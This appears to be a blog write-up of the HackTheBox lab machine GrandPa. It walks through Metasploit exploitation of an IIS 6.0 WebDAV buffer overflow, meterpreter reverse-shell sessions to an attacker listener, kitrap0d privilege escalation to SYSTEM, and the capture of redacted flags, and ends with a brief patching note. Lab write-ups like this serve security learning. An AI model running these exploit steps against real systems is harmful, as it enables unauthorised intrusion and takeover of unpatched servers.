WriteUp: HackTheBox GrandPa

GrandPa is a windows machine rated easy. The machine is running a vulnerable version of IIS which we are able to exploit and gain access, however, the user we have is not a system user. We end up having to migrate to another user, exploit yet another vulnerability to escalate privileges into system. As system, our quest for the flags is over.

Table of Contents

  1. Reconnaissance
  2. Enumeration
  3. Exploit using Metasploit
  4. Post Exploitation
  5. Privilege Escalation
  6. Defender’s Note

Reconnaissance

Let’s start by running an map scan to verify the running services.

$ nmap -A -T4 -p- 10.10.10.14

We get the following results indicating that HTTP is the only open port. We also see that the machine is running Microsoft IIS httpd 6.0 and allows for Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL. We also see that it is running WebDAV.

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Type: Microsoft-IIS/6.0
|   Server Date: Tue, 29 Jun 2021 20:18:13 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_  WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

Let’s first verify the webpage by navigating to it via the browser. We get the following webpage.

A quick check for the page source reveals nothing in particular.

When we do a quick google search, we see that there is a buffer overflow vulnerability in exploit DB. We also see that a metasploit module exists for the same.

We can confirm the same using searchsploit.

$ searchsploit ScStoragePathFromUrl                                                                                                                                
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                     |  Path                           
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)                                                                         | windows/remote/41992.rb
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                                                                           | windows/remote/41738.py
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results       

Exploit using Metasploit

Let’s start metasploit and search for the module.

$ msfconsole
msf6 > search ScStoragePathFromUrl

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow

We can verify the options that we need to set for the module.

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.176.113  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86

When we set the required options and run the module, we successfully get a meterpreter session.

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
rhosts => 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.24
lhost => 10.10.14.24
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.24:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.14:1031) at 2021-06-29 22:03:47 +0100

meterpreter > 

Post Exploitation

A quick check on who we are logged in as fails.

meterpreter > sysinfo
Computer        : GRANPA
OS              : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.

Since we are not getting a user, we can try and migrate to a different user. Let’s check the services running and pick a service that is running under a user context.

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System                                                          
 272   4     smss.exe                                                        
 324   272   csrss.exe                                                       
 348   272   winlogon.exe                                                    
 396   348   services.exe                                                    
 408   348   lsass.exe                                                       
 584   396   svchost.exe                                                     
 672   396   svchost.exe                                                     
 728   396   svchost.exe                                                     
 744   584   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 756   396   svchost.exe                                                     
 792   396   svchost.exe                                                     
 928   396   spoolsv.exe                                                     
 956   396   msdtc.exe                                                       
 976   1448  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 1068  396   cisvc.exe                                                       
 1112  396   svchost.exe                                                     
 1172  396   inetinfo.exe                                                    
 1208  396   svchost.exe                                                     
 1320  396   VGAuthService.exe                                               
 1400  396   vmtoolsd.exe                                                    
 1448  396   svchost.exe                                                     
 1588  396   svchost.exe                                                     
 1700  396   alg.exe                                                         
 1760  348   logon.scr                                                       
 1824  584   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1856  976   rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 1908  396   dllhost.exe                                                     
 2296  584   wmiprvse.exe                                                    
 3928  1068  cidaemon.exe                                                    
 3972  1068  cidaemon.exe                                                    
 3996  1068  cidaemon.exe                                                    
 4048  1856  cmd.exe            x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\cmd.exe

meterpreter > migrate 744
[*] Migrating from 1856 to 744...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

Now that we have a user, let’s drop into shell and see if there is anything interesting.

meterpreter > shell
Process 3200 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\WINDOWS

12/24/2017  08:27 PM    <DIR>          .
12/24/2017  08:27 PM    <DIR>          ..
06/29/2021  11:07 PM                 0 0.log
04/12/2017  04:41 PM    <DIR>          ADAM
04/12/2017  04:41 PM    <DIR>          addins
04/12/2017  04:41 PM    <DIR>          ADFS
02/18/2007  03:00 PM         1,041,920 adfs.msp
04/12/2017  05:26 PM               834 AdfsOcm.log
//TRUNCATED
02/18/2007  03:00 PM               707 _default.pif
              87 File(s)      8,925,261 bytes
              40 Dir(s)  18,090,725,376 bytes free

We don’t see a user directory under windows.

Privilege Escalation

Let’s exit the shell and background this session. We can now search for possible privilege escalation modules that we can use.

C:\>exit
exit
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester

There is only one possibility in this case. Let’s use it, set options and run it.

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0
msf6 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > 
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

We get the below results. It looks like there are a couple of exploits that we can use.

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 37 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

Let’s use the first one, set the options and run it.

msf6 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.176.113  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.24
lhost => 10.10.14.24
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lport 4445
lport => 4445
msf6 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.24:4445 
[*] Launching notepad to host the exploit...
[+] Process 3256 launched.
[*] Reflectively injecting the exploit DLL into 3256...
[*] Injecting exploit into 3256 ...
[*] Exploit injected. Injecting payload into 3256...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 2 opened (10.10.14.24:4445 -> 10.10.10.14:1032) at 2021-06-29 22:39:08 +0100

Looks like we have a session. When we verify the user we are logged in as, we see that we have authority system meaning we have rooted the box. Let’s drop into the shell and get the flags.

meterpreter > sysinfo
Computer        : GRANPA
OS              : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1244 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

User Flag

To get the user flag, we need to locate the user’s desktop. We find a user called Harry and the user.txt is in his folder.

C:\Documents and Settings\Administrator\Desktop>cd ../..
cd ../..

C:\Documents and Settings>cd Harry      
cd Harry

C:\Documents and Settings\Harry>cd Desktop
cd Desktop

C:\Documents and Settings\Harry\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Harry\Desktop

04/12/2017  05:32 PM    <DIR>          .
04/12/2017  05:32 PM    <DIR>          ..
04/12/2017  05:32 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,116,325,376 bytes free

C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
bdff5XXXXXXXXXXXXXXXXXXXXa5d869

Root Flag

The root flag is usually in the Administrator’s desktop.

C:\>cd Documents and Settings
cd Documents and Settings

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  05:32 PM    <DIR>          .
04/12/2017  05:32 PM    <DIR>          ..
04/12/2017  05:12 PM    <DIR>          Administrator
04/12/2017  05:03 PM    <DIR>          All Users
04/12/2017  05:32 PM    <DIR>          Harry
               0 File(s)              0 bytes
               5 Dir(s)  18,090,659,840 bytes free

C:\Documents and Settings>cd Administrator
cd Administrator

C:\Documents and Settings\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Administrator

04/12/2017  05:12 PM    <DIR>          .
04/12/2017  05:12 PM    <DIR>          ..
04/12/2017  05:28 PM    <DIR>          Desktop
04/12/2017  05:12 PM    <DIR>          Favorites
04/12/2017  05:12 PM    <DIR>          My Documents
04/12/2017  04:42 PM    <DIR>          Start Menu
04/12/2017  04:44 PM                 0 Sti_Trace.log
               1 File(s)              0 bytes
               6 Dir(s)  18,090,659,840 bytes free

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Administrator\Desktop

04/12/2017  05:28 PM    <DIR>          .
04/12/2017  05:28 PM    <DIR>          ..
04/12/2017  05:29 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,090,655,744 bytes free

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e9XXXXXXXXXXXXXXXXXXXXXX28bb7b

Defender’s Note

  1. Patch systems in a timely manner. We were able to gain access and escalate privileges due to vulnerabilities that had not been patched.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s